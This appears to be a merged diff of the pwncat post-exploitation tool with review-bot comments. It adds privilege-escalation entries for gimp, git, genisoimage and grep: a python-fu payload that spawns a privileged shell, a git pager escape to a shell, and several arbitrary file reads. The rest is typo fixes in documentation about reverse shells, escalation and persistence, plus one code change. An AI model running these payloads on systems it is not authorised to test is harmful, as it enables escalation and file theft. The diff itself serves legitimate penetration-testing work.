Merge branch 'master' of github.com:calebstewart/pwncat
94ea7ea969
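--- a/PATH-NOT-SHOWN-ON-PAGE
+++ b/PATH-NOT-SHOWN-ON-PAGE
@@ -800,6 +800,64 @@
 "args": ["open", "-e", "'{cat} {lfile}'", "rdoc"]
 }
 ],
+//-------------------------------------------------------------------
+"genisoimage": [
+{
+"type": "read",
+"stream" : "print",
+"payload": "{command} -q -o - {lfile} | {tail} -c +49152",
+"args": []
+}
+],
+//-------------------------------------------------------------------
+"gimp": [
+{
+"type": "shell",
+"payload": "{command}",
+"args": ["-idf", "--batch-interpreter=python-fu-eval", "-b", "'import os; os.system(\"{shell} -p\");gimp.exit()'"],
+"exit": "exit"
+},
+{
+"type": "read",
+"stream": "raw",
+"payload": "{command} 2>/dev/null",
+"args": ["-idf", "--batch-interpreter=python-fu-eval", "-b", "'import sys; sys.stdout.write(open(\"{lfile}\",\"rb\").read());gimp.exit()'"]
+}
+
+// This 'write' technique seems to fail because it cannot capture stdin, being a "subprocess".
+// Since it can get a shell, this is not really an issue.
+// {
+// "type": "write",
+// "stream":"raw",
+// "payload": "{command} 2>/dev/null",
+// "args": ["-idf", "--batch-interpreter=python-fu-eval", "-b", "'import sys, shutil; shutil.copyfileobj(sys.stdin.buffer, open(\"{lfile}\",\"wb\"),length={length});gimp.exit()'"]
+// },
+// {
+// "type": "write",
+// "stream":"base64",
+// "payload": "{command} 2>/dev/null",
+// "args": ["-idf", "--batch-interpreter=python-fu-eval", "-b", "'exec(\"\"\"import sys,base64\\nwith open(\"{lfile}\",\"wb\") as f:\\n\\tfor chunk in iter(lambda: sys.stdin.read(4), b\"\"):\\n\\t\\tf.write(base64.b64decode(chunk))\"\"\")\\ngimp.exit()'"]
+// }
+],
+//-------------------------------------------------------------------
+"git": [
+{
+"type": "shell",
+"payload": "{command}",
+"args": ["help", "config"],
+"input": "!{shell}\n",
+"exit": "exit\nq\n"
+}
+],
+//-------------------------------------------------------------------
+"grep": [
+{
+"type": "read",
+"stream":"print",
+"payload": "{command}",
+"args": ["''", "{lfile}"]
+}
+],
 
 
 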
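Review bot: The new `genisoimage` entry writes its stream key as `"stream" : "print"`, while the other entries added in this hunk use `"stream": "raw"` and `"stream":"print"`; one spelling, `"stream": "print"`, across the new entries would keep the file greppable and consistent with the surrounding data. The two commented-out `write` techniques for `gimp` carry a one-line reason but otherwise leave a large block of dead data in the file; either drop them or reduce them to the explanatory comment and a pointer to where the failed attempt is recorded. The `gimp` read entry ends with `}` and no trailing comma before the comment block and the closing `],`, which is correct as written, but worth re-checking whenever the commented entries are restored. The file's top-level object starts and ends outside this hunk.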
@ -3,7 +3,7 @@ API Documentation
|
|||||||
|
|
||||||
``pwncat`` is fully usable without modification, but also provides a scriptable method of interacting
|
``pwncat`` is fully usable without modification, but also provides a scriptable method of interacting
|
||||||
with the remote host. A large variety of interaction with the remote host has been abstracted to
|
with the remote host. A large variety of interaction with the remote host has been abstracted to
|
||||||
make interaction via python seemless. This is beneficial both for implementing simple ``pwncat``
|
make interaction via Python seamless. This is beneficial both for implementing simple ``pwncat``
|
||||||
prompt commands or more complicated privilege escalation or persistence methods.
|
prompt commands or more complicated privilege escalation or persistence methods.
|
||||||
|
|
||||||
.. toctree::
|
.. toctree::
|
||||||
|
@ -9,7 +9,7 @@ the ``pwncat/privesc`` directory.
|
|||||||
Methods vs Techniques
|
Methods vs Techniques
|
||||||
---------------------
|
---------------------
|
||||||
|
|
||||||
Privelege escalation methods may implement multiple techniques. Techniques represent a single action
|
Privilege escalation methods may implement multiple techniques. Techniques represent a single action
|
||||||
which a specific privilege escalation method can perform. Each technique is identified by it's method,
|
which a specific privilege escalation method can perform. Each technique is identified by it's method,
|
||||||
the user which the action can be performed as, a Capability and some method specific data.
|
the user which the action can be performed as, a Capability and some method specific data.
|
||||||
|
|
||||||
|
@ -24,7 +24,7 @@ processes output. If ``delim`` is false, this is equivalent to sending the comma
|
|||||||
directly with ``pwncat.victim.client.send("ls\n".encode("utf-8"))``. However, setting ``delim`` to
|
directly with ``pwncat.victim.client.send("ls\n".encode("utf-8"))``. However, setting ``delim`` to
|
||||||
True (the default value) instructs the method to prepend and append delimeters. ``process`` will
|
True (the default value) instructs the method to prepend and append delimeters. ``process`` will
|
||||||
also wait for the starting delimeter to be sent before returning. This means that with ``delim``
|
also wait for the starting delimeter to be sent before returning. This means that with ``delim``
|
||||||
on, reading data from ``pwncat.victim.client`` after calling process with be the output of the process
|
on, reading data from ``pwncat.victim.client`` after calling ``process`` will be the output of the process
|
||||||
up until the end delimeter.
|
up until the end delimeter.
|
||||||
|
|
||||||
The next process creation method is ``run``. This method utilizes ``process``, but automatically waits
|
The next process creation method is ``run``. This method utilizes ``process``, but automatically waits
|
||||||
@ -83,7 +83,7 @@ interface, uploading a local file to a remote file can be accomplished with Pyth
|
|||||||
import os
|
import os
|
||||||
import shutil
|
import shutil
|
||||||
|
|
||||||
with open("loca-file", "rb") as src:
|
with open("local-file", "rb") as src:
|
||||||
with pwncat.victim.open("/tmp/remote-file", "wb",
|
with pwncat.victim.open("/tmp/remote-file", "wb",
|
||||||
length=os.path.getsize("local-file")) as dst:
|
length=os.path.getsize("local-file")) as dst:
|
||||||
shutil.copyfileobj(src, dst)
|
shutil.copyfileobj(src, dst)
|
||||||
@ -111,7 +111,7 @@ auto-start, starting, stopping and creation of remote services.
|
|||||||
To query a list of remote services, you can use the ``pwncat.victim.services`` property. This is an iterator
|
To query a list of remote services, you can use the ``pwncat.victim.services`` property. This is an iterator
|
||||||
yielding each abstracted service object. Each object contains a name, description, and state as well as
|
yielding each abstracted service object. Each object contains a name, description, and state as well as
|
||||||
methods for starting, stopping, enabling or disabling the service. This functionality obviously depends
|
methods for starting, stopping, enabling or disabling the service. This functionality obviously depends
|
||||||
on you having the correct permission to manage the services, however retrieve the state and list of
|
on you having the correct permission to manage the services, however retrieving the state and list of
|
||||||
services should work regardless of your permission level.
|
services should work regardless of your permission level.
|
||||||
|
|
||||||
.. code-block:: python
|
.. code-block:: python
|
||||||
@ -122,7 +122,7 @@ services should work regardless of your permission level.
|
|||||||
print(f"{service.name} is {'running' if service.running else 'stopped'}")
|
print(f"{service.name} is {'running' if service.running else 'stopped'}")
|
||||||
|
|
||||||
To find a specific service by name, there is a ``find_service`` method which returns an individual
|
To find a specific service by name, there is a ``find_service`` method which returns an individual
|
||||||
remote service object. If the service is not found, a ValueError is raised.
|
remote service object. If the service is not found, a ``ValueError`` is raised.
|
||||||
|
|
||||||
.. code-block:: python
|
.. code-block:: python
|
||||||
|
|
||||||
|
@ -47,7 +47,7 @@ you can use the "--password/-p" parameter:
|
|||||||
|
|
||||||
.. code-block:: bash
|
.. code-block:: bash
|
||||||
|
|
||||||
set -p bob "b0b5_P@ss0rd"
|
set -p bob "b0b5_P@ssw0rd"
|
||||||
|
|
||||||
Key Bindings
|
Key Bindings
|
||||||
------------
|
------------
|
||||||
|
@ -13,7 +13,7 @@ available on the target system. It will then attempt to start a pseudoterminal
|
|||||||
on the remote host and provide you with raw terminal access.
|
on the remote host and provide you with raw terminal access.
|
||||||
|
|
||||||
pwncat doesn't stop there, though. On top of raw terminal access, pwncat can
|
pwncat doesn't stop there, though. On top of raw terminal access, pwncat can
|
||||||
programatically interact with the remote host alongside your terminal access.
|
programmatically interact with the remote host alongside your terminal access.
|
||||||
pwncat provides you with a local shell interface which can utilize your
|
pwncat provides you with a local shell interface which can utilize your
|
||||||
connection for enumeration, file upload/download, automatic persistence
|
connection for enumeration, file upload/download, automatic persistence
|
||||||
installation and even automated privilege escalation.
|
installation and even automated privilege escalation.
|
||||||
@ -39,7 +39,7 @@ reverse shells. It normally goes something like this:
|
|||||||
# You now have a full terminal that doesn't exit on C-c
|
# You now have a full terminal that doesn't exit on C-c
|
||||||
remote$
|
remote$
|
||||||
|
|
||||||
This works well. However, the added steps to get a reverse shell are laberous
|
This works well. However, the added steps to get a reverse shell are laborious
|
||||||
after a while. Also, the danger of losing your remote shell by accidentally
|
after a while. Also, the danger of losing your remote shell by accidentally
|
||||||
pressing "C-c" prior to gaining raw access is high. This was the original
|
pressing "C-c" prior to gaining raw access is high. This was the original
|
||||||
inspiration of this project.
|
inspiration of this project.
|
||||||
|
@ -5,7 +5,7 @@ Installation
|
|||||||
:maxdepth: -1
|
:maxdepth: -1
|
||||||
|
|
||||||
The only system dependency for ``pwncat`` is ``python3`` and ``pip``. For ``pip`` to install all Python dependencies,
|
The only system dependency for ``pwncat`` is ``python3`` and ``pip``. For ``pip`` to install all Python dependencies,
|
||||||
you will likely need your distributions Python Development package (``python3-dev`` for debian-based distributions).
|
you will likely need your distributions Python Development package (``python3-dev`` for Debian-based distributions).
|
||||||
Once you have a working ``pip`` installation, you can install ``pwncat`` with the provided setup script:
|
Once you have a working ``pip`` installation, you can install ``pwncat`` with the provided setup script:
|
||||||
|
|
||||||
.. code-block:: bash
|
.. code-block:: bash
|
||||||
|
@ -502,7 +502,7 @@ class Victim:
|
|||||||
:return: The full path to the requested binary or None if it was not found.
|
:return: The full path to the requested binary or None if it was not found.
|
||||||
"""
|
"""
|
||||||
|
|
||||||
if self.has_busybox:
|
if self.host.busybox is not None:
|
||||||
if name in self.busybox_provides:
|
if name in self.busybox_provides:
|
||||||
if quote:
|
if quote:
|
||||||
return f"{shlex.quote(str(self.busybox_path))} {name}"
|
return f"{shlex.quote(str(self.busybox_path))} {name}"
|
||||||
|
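Review bot: The `quote` branch at the end of the hunk passes only the busybox path through `shlex.quote`; `name` is interpolated into the returned command string unquoted. That is safe as long as `busybox_provides` holds bare applet names, but if that collection is ever built from parsed remote output, `return f"{shlex.quote(str(self.busybox_path))} {shlex.quote(name)}"` would make the returned string safe independently of the membership check. The new condition reads `self.host.busybox`, while the following lines still read `self.busybox_provides` and `self.busybox_path`; if those were derived from the replaced `has_busybox` flag they should be confirmed to still agree with it, which I cannot see from the hunk. The enclosing method starts before the hunk.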